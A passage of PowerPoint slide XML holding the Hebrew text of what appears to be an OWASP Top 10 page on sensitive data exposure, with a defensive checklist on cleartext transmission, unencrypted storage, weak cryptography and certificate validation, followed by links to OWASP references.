            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הדבר הראשון שיש לקבוע הוא הדרישות להגנה על המידע בעת תעבורה ובעת אחסון. לדוגמה, סיסמאות, מספרי כרטיסי אשראי, רשומות רפואיות, מידע אישי וסודות מסחריים מחייבים הגנה מרבית, בייחוד במקרים בהם המידע נמצא תחת קטגוריה של חוקי פרטיות דוגמת ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>EU GDPR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, או רגולציות כגון </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PCI DSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. עבור מידע מסוג זה:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>האם המידע מועבר בדרך כלשהי בצורה גלויה ברשת? הדבר נוגע לפרוטוקולים דוגמת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SMTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ו-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. מסוכנת במיוחד תעבורה חיצונית אשר מקורה באינטרנט. בחן את כל התעבורה הפנימית, לדוגמה תעבורה בין רכיבי  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>load balance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, שרת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או מערכות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>back-end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>האם מידע רגיש מאוחסן בצורה גלויה, לרבות בתוך גיבויים?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>האם קיים שימוש באלגוריתמים ישנים המשמשים להצפנה, כברירת מחדל או בשימוש קוד ישן?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>האם קיים שימוש במפתחות הצפנה ישנים, האם מיוצרים או בשימוש חוזר מפתחות הצפנה המבוססים על הצפנה חלשה, או האם לא מבוצע תהליך ניהול מפתחות או החלפת מפתחות?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>האם לא נאכף שימוש בהצפנה, לדוגמא, האם לא מבוצע שימוש בהגדרות אבטחה ברמת הדפדפן או ברמת ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>האם ההגדרות בצד המשתמש / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (דוגמת יישום או </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mail client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) אינו מוודא כי התעודה בצד השרת השולח בתוקף?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>למידע נוסף ראה מסמך </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ASVS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, פרקים </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Crypto (V7)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Data Prot (V9)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> וכן </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>SSL/TLS (V10)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8620" y="6372200"/>
            <a:ext cx="3383280" cy="2761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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId7"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Protect Data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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rPr>
              <a:t>OWASP Application Security Verification Standard (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>V7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Transport Layer Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: User Privacy Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheets: Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>Cryptographic Storage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>OWASP Security Headers Project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
